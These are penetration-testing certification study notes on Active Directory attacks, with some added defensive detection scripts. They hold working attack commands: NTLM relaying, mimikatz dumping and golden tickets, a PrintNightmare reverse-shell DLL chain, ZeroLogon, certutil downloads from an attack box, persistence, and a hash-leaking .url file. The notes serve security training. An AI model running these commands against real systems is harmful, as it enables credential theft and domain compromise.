
PNPT Notes

Active Directory Attacks

LLMNR Poisoning

Link-Local Multicast Name Resolution (LLMNR) is used when DNS fails to resolve a hostname. It can be an easy win if LLMNR is not disabled in the environment and users have weak credentials. Use Responder from the impacket suite to listen on an interface; it tends to work better when there is more traffic on the network.

```
python responder.py -I eth0 -rdwv
```

When a host falls back to LLMNR (for example, for a name DNS cannot resolve), Responder captures the username and NTLMv2 hash, which can be cracked with john or hashcat.

```
john --wordlist=/path/to/rockyou.txt /path/to/hash.txt
hashcat -m 5600 /path/to/hash.txt /path/to/rockyou.txt
```

-m 5600 is the hashcat mode for NTLMv2.

The hashcat binary can be downloaded from the hashcat website and should be run on the base OS rather than inside a VM, so that it can use the GPU.

Defending against LLMNR attacks

The best defense against this attack is simply to disable LLMNR and NBT-NS. If they cannot be disabled, enforce strong access controls and strong passwords on the network.
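An added defender-side example (not part of the original notes): an LLMNR canary. It multicasts a query for a name that does not exist in DNS, so the only hosts that should answer are poisoners; the packet builder and parser follow the LLMNR wire format (the same as a DNS query/response) and use only the Python standard library. The canary name, transaction ID and the sample packets are assumptions.

```python
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355                  # LLMNR multicast group and UDP port

def build_llmnr_query(name, txid):
    """Encode an LLMNR A query; the wire format is the same as a DNS query."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)       # flags 0, one question
    qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)           # QTYPE=A, QCLASS=IN

def _read_name(data, off):
    # Decode labels, following a compression pointer (0xC0xx) if one appears.
    labels = []
    while data[off] and data[off] & 0xC0 != 0xC0:
        labels.append(data[off + 1:off + 1 + data[off]].decode())
        off += 1 + data[off]
    if data[off] & 0xC0 == 0xC0:
        ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
        return ".".join(labels + [_read_name(data, ptr)[0]]), off + 2
    return ".".join(labels), off + 1

def parse_llmnr_response(data, expected_txid):
    """Return the IPv4 addresses in the answer section, or [] if this is not a reply to our query."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not flags & 0x8000:             # QR bit must be set
        return []
    off = 12
    for _ in range(qdcount):                                    # skip the echoed question
        off = _read_name(data, off)[1] + 4
    addrs = []
    for _ in range(ancount):
        off = _read_name(data, off)[1]
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[off + 10:off + 14]))
        off += 10 + rdlen
    return addrs

def probe(name="canary-name-that-does-not-exist", timeout=2.0):
    """Multicast one query for a name DNS will never resolve; every answer is a poisoner candidate."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, 0xBEEF), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:                                             # collect until the timeout fires
            data, (src, _) = sock.recvfrom(512)
            hits.append((src, parse_llmnr_response(data, 0xBEEF)))
    except socket.timeout:
        return hits
```

Run probe() from a workstation on the segment; a non-empty result lists the source IP of each host that claimed the canary name.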

SMB Relay Attacks

Instead of cracking the hash, we can also relay the authentication to gain access to a machine, provided the user whose hash we captured is a local admin on the target machine. SMB signing must be disabled on the target for this to work.

Edit the Responder.conf file and turn off the SMB and HTTP servers, then run Responder. In this setup Responder only captures the authentication attempts; ntlmrelayx does the actual relay.

```
python ntlmrelayx.py -tf targets.txt -smb2support
```

By default ntlmrelayx dumps the SAM of each host it relays to, giving access to the local user hashes.

Add the -i argument to get an interactive SMB client shell spawned on your machine (“started interactive SMB client shell via TCP on localhost:11000”); use netcat to interact with it, can view/modify/

Enumerating hosts with SMB signing disabled

```
nmap --script=smb2-security-mode.nse -p 445 192.168.1.0/24
```

SMB signing is disabled by default on workstations, and enabled and required by default on servers. A host reporting “enabled but not required” is vulnerable to relay.

Defending against SMB relay attacks

Enable SMB signing on all devices, disable NTLM authentication, use account tiering (least privilege), and restrict local admin accounts.
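An added example, not from the original notes, for turning the nmap scan above into a relay-exposure list: it parses the -oX output of smb2-security-mode and classifies each host, which is the check a defender runs before and after enforcing signing. The XML below is a constructed sample, not a real scan.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for `nmap --script=smb2-security-mode -p 445 ...` (not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun>
  <host><address addr="192.168.1.10" addrtype="ipv4"/><hostscript>
    <script id="smb2-security-mode" output="&#10;  3:1:1: &#10;    Message signing enabled and required"/>
  </hostscript></host>
  <host><address addr="192.168.1.20" addrtype="ipv4"/><hostscript>
    <script id="smb2-security-mode" output="&#10;  3:1:1: &#10;    Message signing enabled but not required"/>
  </hostscript></host>
  <host><address addr="192.168.1.30" addrtype="ipv4"/><hostscript>
    <script id="smb2-security-mode" output="&#10;  2:1:0: &#10;    Message signing disabled"/>
  </hostscript></host>
  <host><address addr="192.168.1.40" addrtype="ipv4"/></host>
</nmaprun>
"""

def classify(script_output):
    """Map the script's text to one of: required, not-required, disabled, unknown."""
    text = script_output.lower()
    if "enabled and required" in text:
        return "required"
    if "enabled but not required" in text:
        return "not-required"
    if "signing disabled" in text:
        return "disabled"
    return "unknown"

def signing_status(xml_text):
    """Return {ipv4: status} for every host in the scan; hosts without a script result get 'no-result'."""
    status = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.iter("address") if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        status[addr] = "no-result"
        for script in host.iter("script"):          # hostscript or port script, either location
            if script.get("id") == "smb2-security-mode":
                status[addr] = classify(script.get("output", ""))
    return status

def relay_exposed(status):
    """Hosts that accept unsigned SMB sessions, i.e. candidates for NTLM relay."""
    return sorted(ip for ip, s in status.items() if s in ("not-required", "disabled"))
```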

IPv6 Attacks

Clone mitm6 and run “pip3 install .” in its directory.

Start by running

```
mitm6 -d domain.local
```

and concurrently run

```
ntlmrelayx.py -6 -t ldaps://dc.ip.add.res -wh fakewpad.domain.local -l lootme
```

ntlmrelayx is a very extensive tool: through the relayed LDAP session it can create new users, update ACLs, dump credentials, gather information, etc.

Post Compromise Enumeration

PowerView

Download it on the victim machine, then run

```
powershell.exe -ep bypass
. .\PowerView.ps1
```

(dot-source the script so that its functions are loaded into the current session).

Get-NetDomain - general information about the domain: forest name, DCs, etc.

Get-NetDomainController - more specific information about the DCs: IP addresses, names, etc.

Get-DomainPolicy - shows the group policies on the domain: Kerberos, System Access, version, etc.

(Get-DomainPolicy)."system access" - shows the system access policies: minimum password age, password complexity, password length, etc.

Get-NetUser - dumps information on all users

Get-NetUser | select cn - lists the users
Get-NetUser | select samaccountname - lists the account names

Get-UserProperty - lists all potential user properties

Get-UserProperty -Properties pwdlastset - shows when each user's password was last set

Get-UserProperty -Properties logoncount - can reveal honeypot accounts (low logon counts)

Get-NetComputer - lists all computers

Get-NetComputer -FullData - dumps extensive information about all computers

Get-NetComputer -FullData | select OperatingSystem - lists every computer's operating system

Get-NetGroup - shows groups

Get-NetGroup -GroupName "Domain Admins"

Get-NetGroupMember -GroupName "Domain Admins" - lists the members of Domain Admins

Invoke-ShareFinder - SMB share enumeration

Get-NetGPO - lists the group policy objects

Get-NetGPO | select displayname, whenchanged - lists GPO names and when they were last changed

Bloodhound

BloodHound ingests data collected from AD, displays it as a graph in a GUI, and works out the shortest paths to Domain Admin.

```
apt install bloodhound
neo4j console
bloodhound
```

After changing the default neo4j password, you can start pulling data from the environment by downloading SharpHound onto the victim machine.

```
powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain Domain.local -ZipFileName file.zip
```

Transfer the zip file to the attack machine and upload it into BloodHound.

Post Compromise Attacks

Pass the Hash / Pass

```
crackmapexec smb 10.10.10.0/24 -u user -d DOMAIN -p password
```

This sprays the network with the user’s credentials; it can be done with the user’s password hash as well.

```
crackmapexec smb 10.10.10.0/24 -u "user" -H <hash> --local-auth
```

or

```
psexec.py user:@<ip address> -hashes <lmhash>:<nthash>
```

Dumping Hashes with secretsdump.py

```
secretsdump.py domain/user:pass@ipaddress
```

secretsdump can dump SAM hashes, LSA secrets, API keys, etc.

```
hashcat64.exe -m 1000 hashes.txt rockyou.txt
```

-m 1000 is the hashcat mode for NTLM.

Token Impersonation

A token is a temporary key that lets you access a system or network without providing credentials for every action you take. There are two types of token:

  1. Delegate - created for interactive logons, such as logging into a machine or using RDP
  2. Impersonate - “non-interactive”, such as attaching a network drive or running a domain logon script

Doing it with Metasploit:

```
msfconsole
use exploit/windows/smb/psexec
set rhosts <dc ip address>
set smbdomain <domain.local>
set smbpass <pass>
set smbuser <user>
show targets
set target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost eth0
run
```

If all goes well you’ll land in a Meterpreter shell, where lots of extensions can be loaded, such as mimikatz, powershell and incognito. If a user has logged into the machine, you may be able to impersonate them with their token using incognito.

```
load incognito
list_tokens -u
impersonate_token <domain>\\<user>
shell
```

This places you in a shell as the new user.

```
rev2self
```

reverts to your original token.

Kerberoasting

How Kerberos works, supposing a user is attempting to access an application server:

  1. The user requests a TGT (Ticket Granting Ticket) from the domain controller (the key distribution center, KDC); the KDC verifies the username and NTLM hash.
  2. If the credentials are valid, the user receives a TGT from the DC, encrypted with the krbtgt hash.
  3. The user presents the TGT back to the DC, this time requesting a TGS (Ticket Granting Service ticket).
  4. The DC verifies the TGT by decrypting it with its own hash, then sends the user a TGS encrypted with the application server’s hash.
  5. The user sends the encrypted TGS to the application server, which decrypts it with its own hash and authenticates the user.
  6. User and application server have now mutually authenticated each other securely, good job Microsoft!

In short, valid creds -> TGT -> TGS -> access to service

Instead of using the TGS to authenticate to a server, we can crack the hash and BECOME the server.

```
python GetUserSPNs.py domain.local/user:pass -dc-ip <dc ip> -request
```

This requests a service ticket and prints the hash, which can be cracked with hashcat (-m 13100 for Kerberos TGS-REP). Because this exploits a feature of Kerberos, the attack cannot be prevented; it can only be mitigated with strong passwords (30+ characters for service accounts) and by following the principle of least privilege.
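An added detection example (not from the original notes): since Kerberoasting cannot be prevented, the defensive counterpart is spotting it, and a roasting run shows up as one account requesting RC4 (0x17) service tickets for many service accounts within a short window (Security event 4769). The sample events and their field names are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample of the fields we need from Security event 4769 (not real log data).
SAMPLE_4769 = [
    {"time": "2024-03-01T10:00:01", "account": "jsmith@CORP.LOCAL", "service": "sqlsvc",    "etype": "0x17"},
    {"time": "2024-03-01T10:00:02", "account": "jsmith@CORP.LOCAL", "service": "httpsvc",   "etype": "0x17"},
    {"time": "2024-03-01T10:00:02", "account": "jsmith@CORP.LOCAL", "service": "backupsvc", "etype": "0x17"},
    {"time": "2024-03-01T10:00:03", "account": "jsmith@CORP.LOCAL", "service": "WS01$",     "etype": "0x17"},
    {"time": "2024-03-01T10:00:03", "account": "jsmith@CORP.LOCAL", "service": "krbtgt",    "etype": "0x12"},
    {"time": "2024-03-01T10:05:00", "account": "adoe@CORP.LOCAL",   "service": "sqlsvc",    "etype": "0x12"},
    {"time": "2024-03-01T11:00:00", "account": "adoe@CORP.LOCAL",   "service": "httpsvc",   "etype": "0x17"},
]

def is_roastable_request(ev):
    """An RC4 service ticket for a non-machine, non-krbtgt service account: what a roasting run asks for."""
    svc = ev["service"]
    return ev["etype"].lower() == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt"

def kerberoast_suspects(events, window=timedelta(minutes=5), min_services=3):
    """Map account -> sorted service accounts for any account that requested RC4 tickets
    for at least min_services distinct service accounts within one sliding window."""
    by_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    suspects = {}
    for account, requests in by_account.items():
        requests.sort()
        for i, (start, _) in enumerate(requests):
            in_window = {svc for t, svc in requests[i:] if t - start <= window}
            if len(in_window) >= min_services:
                suspects[account] = sorted(in_window)
                break
    return suspects
```

Moving service accounts to AES-only (no RC4) both shrinks the crackable surface and makes any remaining 0x17 request a stronger signal.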

GPP / cPassword Attacks

Group Policy Preferences allowed admins to create policies with embedded credentials. These creds were encrypted and placed in the “Groups.xml” file, which resides in the SYSVOL folder and can be read by any domain user. The file contains the encrypted “cPassword”, which can be decrypted easily with gpp-decrypt (installed by default on Kali). Invoke-GPP can be used to check for this automatically. Always look for this on older servers; it could be an easy win.

URL Attacks

You need access to a file share to do this, either through a user account (post-exploitation) or on a wide-open share (less likely). Create a file containing this:

```
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\<attackbox IP>\%USERNAME%.icon
IconIndex=1
```

The name of the file matters: it must start with an @ or ~ so that it sorts alphabetically to the top of the directory, and it must end with the .url extension. The name should be something relevant to the company, e.g. “@Q4 financials.url”. Save as type “all files”. When users browse to the directory, Explorer fetches the icon from the UNC path and their hash is sent to the attack box, where a Responder listener picks it up.
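An added audit example, not part of the original notes, covering both the GPP cPassword section and the URL-file section above: it walks a share or SYSVOL tree and reports GPP XML files that still carry a cpassword attribute and .url files whose IconFile points at a UNC path. The sample tree it builds is constructed, and its path and account names are assumptions.

```python
import configparser
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can carry an embedded, reversibly encrypted cpassword attribute.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml", "datasources.xml", "drives.xml", "printers.xml"}

def gpp_cpassword_users(path):
    """Account names of every element in a GPP XML file that still carries a cpassword attribute."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return []
    return [el.get("userName") or el.get("accountName") or "?" for el in root.iter() if "cpassword" in el.attrib]

def url_remote_icon(path):
    """The IconFile value of a .url file when it points at a UNC path (\\\\host\\...), else None."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read(path, encoding="utf-8")
    except configparser.Error:
        return None
    icon = cp.get("InternetShortcut", "IconFile", fallback="")
    return icon if icon.startswith("\\\\") else None

def audit_share(root):
    """Walk a share or SYSVOL tree and return (kind, path, detail) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name.lower() in GPP_FILES:
                findings.extend(("gpp-cpassword", full, user) for user in gpp_cpassword_users(full))
            elif name.lower().endswith(".url") and url_remote_icon(full):
                findings.append(("url-remote-icon", full, url_remote_icon(full)))
    return findings

def build_sample_share():
    """Constructed test tree (not real data): a Groups.xml with a cpassword and a planted .url file."""
    root = tempfile.mkdtemp()
    gpp_dir = os.path.join(root, "Policies", "{GUID}", "Machine", "Preferences", "Groups")
    os.makedirs(gpp_dir)
    with open(os.path.join(gpp_dir, "Groups.xml"), "w") as f:
        f.write('<Groups><User name="localadmin"><Properties userName="localadmin" '
                'cpassword="CONSTRUCTED-PLACEHOLDER"/></User></Groups>')
    with open(os.path.join(root, "@Q4 financials.url"), "w") as f:
        f.write("[InternetShortcut]\nURL=https://intranet\nIconFile=\\\\10.0.0.5\\%USERNAME%.icon\nIconIndex=1\n")
    return root
```

Point audit_share at a mounted SYSVOL or departmental share; every gpp-cpassword finding is a credential to rotate and a file to delete, and every url-remote-icon finding is a file to remove and a source host to investigate.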

PrintNightmare (CVE-2021-1675)

Use rpcdump.py from impacket to scan for potentially vulnerable hosts. If it returns a value, the host could be vulnerable.

```
rpcdump.py @<Victim IP> | egrep 'MS-RPRN|MS-PAR'
```

Use msfvenom to generate a payload and msfconsole to set up the listener:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<listener IP> LPORT=<port> -f dll > shell.dll
msfconsole
use multi/handler
options
set payload windows/x64/meterpreter/reverse_tcp
options
set lport <lport>
set lhost <listener IP>
run
```

Now we need to host the DLL so the target can reach it:

```
smbserver.py share $(pwd) -smb2support   # serves the current directory as \\<attack box IP>\share
```

Now we just need a valid user/password combination (it does not have to be an administrator).

```
python3 CVE-2021-1675.py domain.local/<user>:<password>@<dc ip> '\\<attack box IP>\share\shell.dll'
```

You should get a Meterpreter shell on your listener and can proceed as usual: getuid, hashdump, etc. Most AV will pick up shell.dll if you don’t obfuscate it in some way.

Mimikatz

A tool written in C used to steal credentials, generate Kerberos tickets, and carry out attacks such as pass the hash, pass the ticket, golden ticket, etc. Very extensive tool. Use it on the DC post-compromise.

```
mimikatz.exe
privilege::debug
```

“Privilege ‘20’ OK” means you are good to go.

```
sekurlsa::logonpasswords
```

Shows the computer account’s username and NTLM hash, as well as every user who has logged in since the last reboot; this information is dumped from memory. The computer’s NTLM hash (not NTLMv2) can be passed to see whether it grants access anywhere on the domain. If a DA has logged into the computer, you can potentially pass their hash or try to crack it.

```
lsadump::sam
```

or

```
lsadump::sam /patch
```

This doesn’t always work; other options are Metasploit, secretsdump, etc.

```
lsadump::lsa /patch
```

LSA = Local Security Authority; dumping it shows usernames and NTLM hashes.

Golden Ticket attack with Mimikatz

A golden ticket gives complete access to the ENTIRE domain.

```
mimikatz.exe
lsadump::lsa /inject /name:krbtgt
```

Grab two things from the output:

  1. The SID of the domain (looks like S-1-5-32-1045337234-12924708993-5683276719-19000)
  2. The NTLM hash of the krbtgt account

```
kerberos::golden /User:Administrator /domain:<domain.local> /sid:<SID> /krbtgt:<krbtgt ntlm hash> /id:500 /ptt
```

ID 500 is the RID of the built-in Administrator account, and /ptt means pass the ticket (inject it into the current session). The output should say “golden ticket for ‘Administrator @ ' successfully submitted for current session”.

```
misc::cmd
dir \\<machine>\<drive>
```

or

```
psexec.exe \\<machine> cmd.exe
```

Golden ticket can be used for persistence as well.

Zero Logon

CVE-2020-1472. A dangerous attack to run in an environment: it sets the DC machine account password to null, and if you don’t restore the password you can break the server.

```
./zerologon_tester.py <DC netbios name> <DC IP>
python3 cve-2020-1472-exploit.py <DC netbios name> <DC IP>
```

Use the hexpass value and restorepassword.py to restore the DC. An easy attack to pull off, scary in the real world.

Post Exploitation

File Transfers

Certutil

```
certutil.exe -urlcache -f http://<attackbox IP>/malicious.txt malicious.txt
```

FTP

```
python -m pyftpdlib 21
ftp <attacker ip>
```

A Meterpreter shell also has built-in upload and download commands.

Maintaining Access

Persistence Scripts:

```
run persistence -h
```

```
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
```

Scheduled Tasks

```
run scheduleme
run schtaskabuse
```

Add a User

```
net user username password /add
```

Pivoting

```
msfconsole
use exploit/windows/smb/psexec
options
set rhosts <victim ip>
set smbpass <password>
set smbuser <user>
set payload windows/x64/meterpreter/reverse_tcp
set lhost <interface>
set target 2
run
shell
route print
arp -a
^C y                      # Ctrl+C, then y, to leave the shell channel and return to meterpreter
run autoroute -s <unreachable subnet>/24
run autoroute -p
background
```

For further pivoting there are proxychains, chisel, ssh and lots of other tools.

Clean up

Make the system as it was when you entered it: remove executables, scripts, added files or users, malware, rootkits, and revert settings to their original configuration.

Web Applications

Email Enumeration

hunter(.)io

phonebook(.)cz

tools(.)verifyemailaddress(.)io

Subdomain Enumeration

```
sublist3r -d corp(dot)com
```

crt(.)sh with %.corp.com as the query does certificate fingerprinting.

Asset Finder

```
go get -u github.com/tomnomnom/assetfinder   # use pimpmykali to fix Go first
assetfinder domain.com >> output.txt
```

Amass

```
export GO111MODULE=on
go get -v -u github.com/OWASP/Amass/v3/...
amass enum -d domain.com >> subs.txt
```

httprobe checks which of the discovered domains are up:

```
go get -u github.com/tomnomnom/httprobe
cat subdomains.txt | httprobe -s -p https:443
```

Host Discovery

```
netdiscover -r x.x.x.0/24
```

sweeps an entire subnet.

OWASP top 10

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging and Monitoring

Windows Privilege Escalation

Initial Enumeration

The systeminfo command shows basic system information; it can be narrowed down with

```
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
```

This shows which version of Windows is running, the architecture, etc.

```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

Shows the installed updates (hotfixes).

```
wmic logicaldisk get caption,description,providername
```

Shows the available drives.

User Enumeration

whoami /groups and net user are good ones to run, as are net localgroup and net localgroup administrators.

Network Enumeration

ipconfig /all gives basic network information and may reveal the domain.

arp -a and route print also give useful information, as does netstat -ano.

Password Hunting

```
findstr /si password *.txt *.ini *.config
```

AV Enumeration

```
sc query windefend
```

Shows whether Windows Defender is running.

```
sc queryex type= service
```

Shows all services running on the machine.

```
netsh advfirewall dump
```

or

```
netsh firewall show state
```

Show firewall information.

```
netsh firewall show config
```

Shows the firewall configuration.

```
run post/multi/recon/local_exploit_suggester
```

Metasploit’s local exploit suggester; run it from a Meterpreter session to get privilege escalation candidates.

Kernel Exploits

The kernel is the program that controls everything in the system: it facilitates interactions between hardware and software components, acting as a translator.

https://github(.)com/SecWiki/windows-kernel-exploits

```
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=
```

This post is licensed under CC BY 4.0 by the author.